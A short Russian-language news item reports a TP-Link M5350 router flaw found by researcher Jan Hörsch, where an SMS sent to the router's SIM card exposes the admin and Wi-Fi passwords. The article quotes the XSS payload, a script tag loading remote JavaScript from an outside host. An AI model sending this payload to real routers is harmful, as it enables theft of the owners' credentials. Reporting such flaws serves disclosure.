Уязвимость в маршрутизаторе TP-Link позволяет получить пароль по SMS

Уязвимость в маршрутизаторе TP-Link позволяет получить пароль по SMS

Путем отправки SMS-сообщения на SIM-карту устройства можно получить пароль к учетной записи администратора и пароль от Wi-Fi.

Специалист из Германии Ян Херш (Jan Hörsch) сообщил об уязвимости в маршрутизаторах производства китайской компании TP-Link, которая позволяет получить пароль к устройству путем отправки SMS-сообщения со специальным скриптом на SIM-карту маршрутизатора.

Проблема затрагивает беспроводной мобильный 3G-маршрутизатор TP-Link M5350. Как пояснил исследователь в беседе с журналистом BleepingComputer, операторы связи часто предлагают данную модель своим клиентам наряду с SIM-картой, вставляемой в маршрутизатор. Эта SIM-карта позволяет маршрутизатору подключаться к сети оператора и так же, как любая другая «симка» имеет свой номер.

В ходе анализа прошивки машрутизатора Херш выявил уязвимость в функции обработки входящих SMS-сообщений. Он выяснил, что путем отправки сообщения со скриптом < script src=//n.ms/a.js >< /script > может получить пароль к учетной записи администратора, идентификатор беспроводной сети (SSID) и пароль от сети Wi-Fi.

По словам специалиста, угроза не так опасна, как кажется на первый взгляд, поскольку для эксплуатации уязвимости злоумышленнику нужно знать номер SIM-карты маршрутизатора.

Большой брат следит за вами, но мы знаем, как остановить его

Подпишитесь на наш канал!